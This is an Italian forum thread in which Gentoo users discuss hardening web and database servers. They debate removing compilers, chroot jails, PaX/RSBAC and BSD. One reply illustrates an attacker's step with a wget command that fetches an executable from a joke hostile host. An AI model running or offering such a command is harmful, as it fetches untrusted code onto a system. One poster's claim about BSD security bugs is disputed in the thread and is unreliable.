Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
come aumentare sicurezza macchine gentoo su web?
View unanswered posts
View posts from last 24 hours
View posts from last 7 days

 
Reply to topic    Gentoo Forums Forum Index Forum italiano (Italian) Forum di discussione italiano
View previous topic :: View next topic  
Author Message
swit
Tux's lil' helper
Tux's lil' helper


Joined: 22 Nov 2004
Posts: 87
Location: /Europe/Italy/Toscany/Lucca

PostPosted: Thu May 11, 2006 7:47 am    Post subject: come aumentare sicurezza macchine gentoo su web? Reply with quote

Salve,
stavo pianificando di installare alcune macchine gentoo che fungereanno da web-server e DB server.
Oltre a installare il profilo hardened vorrei apportare altre piccole modifiche per rendere ancora più sicuro tutto il sistema.

Solitamente su un server web si cancella gcc (cc) e compilatori vari da riga di comando, interprete perl e php per la shell.
(per il php volendo si può scegliere di non installare la parte CLI)
Nel caso di gentoo sarebbe comodo rimuovere anche emerge e tutto l'albero degli ebuilds.

La cosa alla quale avevo pensato è, visto che userò 3/4 macchine identiche perchè non formattare una pen drive da un GB con 2 partizioni ext3, metterci /usr/portage e /usr/bin e poi cancellare questi due moutpoint dal filesystem?
Cancellati i dati interessati dal filesystem, una volta che avrò bisogno dei dati che sono nella pen disk, non farò altro che montarla nelle rispettive directory.

Penso che per /usr/portage non ci siano problemi, ma /usr/bin ci saranno problemi?

Spero che la cosa interessi a molti e di non aver sparato fesserie :)
Non so, se il titolo rende giustizia a questo thread; se qualcuno ne trovasse uno più congruo me lo segnali o se è moderatore lo cambi :)
Back to top
View user's profile Send private message
.:deadhead:.
Advocate
Advocate


Joined: 25 Nov 2003
Posts: 2963
Location: Milano, Italy

PostPosted: Thu May 11, 2006 9:21 am    Post subject: Reply with quote

Io non son convinto che levar gcc sia un modo per aumentare la sicurezza :-D

Se ti bucano ti bucano, ti fidi di una macchina dopo che è stata violata? Ed oggettivamente quanto tempo impiega un attaccante a fare wget www.tispiezzoindue.ru/apriscatole.exe piuttosto che compilarselo?

Se non lo hai già letto, prova a dare una lettura alla fantasmagorica documentazione di gentoo a riguardo.

Inoltre, il profilo hardened è un buon inizio, ma visto che con gentoo l'installazione è facilitata, vuol dire che puoi concentrarti sulla parte fondamentale: la configurazione,perchè anche con il profilo hardened se qualcosa è configurato male ti aprono...
_________________
Proudly member of the Gentoo Documentation Project: the Italian Conspiracy ! ;)
Back to top
View user's profile Send private message
makoomba
Bodhisattva
Bodhisattva


Joined: 03 Jun 2004
Posts: 1856

PostPosted: Thu May 11, 2006 9:42 am    Post subject: Re: come aumentare sicurezza macchine gentoo su web? Reply with quote

swit wrote:
...

non c'è convenienza nel castrare un server quando puoi configurare apache in chroot.
trovi howto in apposita sezione del forum.
_________________
When all else fails, read the instructions.
Back to top
View user's profile Send private message
.:chrome:.
Advocate
Advocate


Joined: 19 Feb 2005
Posts: 4588
Location: Brescia, Italy

PostPosted: Thu May 11, 2006 1:42 pm    Post subject: Re: come aumentare sicurezza macchine gentoo su web? Reply with quote

come è già stato detto, quelle misure da te indicate sono poco efficaci, e poco sensate.
se ti sfondano la macchina il fatto saliente è ciò che è avvenuto, non il fatto che possano compilare campo minato con il tuo gcc. inoltre, con un sistema gentoo, togliere gcc significa non avere più nessuna possibilità di aggiornare il server, che ti espone a rischi veri e concreti.

le configurazioni in chroot sono una soluzione, una volta io le adottavo in massa. adesso mi sto orientando su altro. la chroot è spesso una grossa complicazione alla gestione e l'aggiornamento del server.

soluzioni tipo PaX + RSBAC ti mettono davvero al sicuro, però bisogna vedere anche se il gioco vale la candela
Back to top
View user's profile Send private message
makoomba
Bodhisattva
Bodhisattva


Joined: 03 Jun 2004
Posts: 1856

PostPosted: Thu May 11, 2006 1:58 pm    Post subject: Re: come aumentare sicurezza macchine gentoo su web? Reply with quote

k.gothmog wrote:
la chroot è spesso una grossa complicazione alla gestione e l'aggiornamento del server.

in generale sì, in altri casì il chroot si ottiene in maniera semplice senza alterare il normale processo di aggiornamento
es: apache + php + mod_security, bind, vari ed eventuali che ora non mi sovvengono.
_________________
When all else fails, read the instructions.
Back to top
View user's profile Send private message
Ilvalle
Guru
Guru


Joined: 07 Mar 2005
Posts: 325
Location: Gallarate - ITALY

PostPosted: Thu May 11, 2006 8:36 pm    Post subject: Reply with quote

C'è anche da dire, che se uno ti buca un demone in ascolto, ti buca anche il chroot,
dicono che quest'ultima sia una delle trap + bacata del kernel linux.
E' sempre qualcosa in +, ma non c'+ nessuna sicurezza concreta.

Se hai due macchine, puoi farle giocare insieme, se una viene bucata , la seconda
prende il posto della prima. Un semplice cluster di firewall (pentium2 son sufficienti).

Ultimo consiglio non usare gentoo, almeno non il kernel linux...(consiglio BSD)
valle
Back to top
View user's profile Send private message
lavish
Bodhisattva
Bodhisattva


Joined: 13 Sep 2004
Posts: 4296

PostPosted: Thu May 11, 2006 9:09 pm    Post subject: Reply with quote

Ilvalle wrote:
Ultimo consiglio non usare gentoo, almeno non il kernel linux...(consiglio BSD)
:?:
Affermazioni del genere è buona norma non farle in un forum su, guarda a caso, gentoo, perchè si parte dal presupporto che si stia usando gentoo (ok, non venirmi a dire "intendevo che poteva usare gentoo/fBSD" :P). Se comunque le si fa, è buona norma motivarle, altrimenti non si fa una gran figura
_________________
minimalblue.com | secgroup.github.io/
Back to top
View user's profile Send private message
Ilvalle
Guru
Guru


Joined: 07 Mar 2005
Posts: 325
Location: Gallarate - ITALY

PostPosted: Thu May 11, 2006 9:44 pm    Post subject: Reply with quote

si ok, opps :)
chiudo umilmente scusa,
Le potenzialita' in ambito di sicurezza del kernel che ho citato son indiscusse.non puoi essere che essere daccordo.
Motivazione: Negli ultimi 10 anni hanno avuto un solo bug di sicurezza. Linux ?
Questo e' il mio consiglio su questo argomento, una via di mezzo come hai detto tu "gentoo/fBSD" puo' essere un compromesso.

valle
Back to top
View user's profile Send private message
.:chrome:.
Advocate
Advocate


Joined: 19 Feb 2005
Posts: 4588
Location: Brescia, Italy

PostPosted: Thu May 11, 2006 10:10 pm    Post subject: Reply with quote

Ilvalle wrote:
Ultimo consiglio non usare gentoo, almeno non il kernel linux...(consiglio BSD)

potrebbe anche starmi bene l'ultima parte, nel senso che posso essere d'accordo sul preferire FreeBSD o meglio OpenBSD a Linux

non sono disposto ad accettare la frecciata verso Gentoo. di distribuzioni ne ho provata qualcuna, ed ho cambiato solo nel momento in cui ho trovato qualcosa che ho ritenuto migliore di quelle che ho usato in passato.
seguendo questo principio, e dato che ho provato tutte le distribuzioni maggiori, arrivo alla semplice conclusione che Gentoo sia la distribuzione migliore che abbia tprovato fino ad oggi, finché si resta nel campo Linux. mi spiace, ma questa è una posizione che oggi sono pronto a difendere a spada tratta... :)
(...e sottolineo, per chi non l'avesse ancora capito, che per me sicurezza e integrità vengono prima di qualuqnue altra cosa)
Back to top
View user's profile Send private message
ProT-0-TypE
Veteran
Veteran


Joined: 20 Dec 2003
Posts: 1624
Location: Cagliari

PostPosted: Thu May 11, 2006 10:32 pm    Post subject: Reply with quote

Ilvalle wrote:

Motivazione: Negli ultimi 10 anni hanno avuto un solo bug di sicurezza.


Ma che dici? per caso hai sentito lontanamente parlare di OpenBSD e ti è venuto spontaneo dire sta sciocchezza?
_________________
[Vuoi guadagnare navigando?]
Back to top
View user's profile Send private message
X-Drum
Advocate
Advocate


Joined: 24 Aug 2003
Posts: 2517
Location: ('Modica','Trieste','Ferrara') Italy

PostPosted: Fri May 12, 2006 9:35 am    Post subject: Reply with quote

k.gothmog wrote:

non sono disposto ad accettare *.* per me sicurezza e integrità vengono prima di qualuqnue altra cosa)

sottoscrivo
_________________
"...There are two sort of lies, lies and benchmarks..."
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Forum italiano (Italian) Forum di discussione italiano All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum